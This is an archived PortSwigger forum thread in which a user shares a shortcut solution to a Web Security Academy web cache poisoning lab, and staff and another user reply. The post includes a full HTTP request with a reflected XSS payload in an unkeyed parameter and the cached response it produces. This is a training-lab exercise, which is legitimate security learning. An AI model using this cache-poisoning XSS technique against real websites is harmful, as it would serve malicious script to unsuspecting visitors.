Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Hi, I think that I found a flaw.

aadda | Last updated: Jan 28, 2021 08:46PM UTC

Hi, I think that I found a flaw on https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-cache-key-injection lab, you can solve the lab just by adding Pragma: x-get-cache-key and issue request to this endpoint : ------------- GET /login?lang=en&utm_content=t'><svg/onload=alert(1)+x=' HTTP/1.1 Pragma: x-get-cache-key ext............ -------------------- you will get response like: ---------------------- HTTP/1.1 302 Found Location: /login/?lang=en&utm_content=t'><svg/onload=alert(1)+x=' Vary: Origin Connection: close Cache-Control: max-age=35 Age: 1 X-Cache-Key: /login?lang=en$$ X-Cache: hit X-XSS-Protection: 0 Content-Length: 0 -------------------- Notice that the X-Cache-Key, means anyone visits the home page will redirect to /login/?lang=en&utm_content=t'><svg/onload=alert(1)+x=', Which is [utm_content] parameter is unkeyed and will reflected to the head tag in html and the XSS will execute. [<link rel="canonical" href='//ace51f121f0a8ff3808125b800b800b0.web-security-academy.net/login/?lang=en&utm_content=t'><svg/onload=alert(1) x=''/>] I just want to send this because it easier than the solution in the lab.

Hannah, PortSwigger Agent | Last updated: Feb 01, 2021 12:50PM UTC

Hi Could you send a video of this to support@portswigger.net so we can verify the solution? Cheers!

nil0x42 | Last updated: Feb 01, 2021 02:38PM UTC

Hi ! I solved the challenge the same way...

Hannah, PortSwigger Agent | Last updated: Feb 02, 2021 12:58PM UTC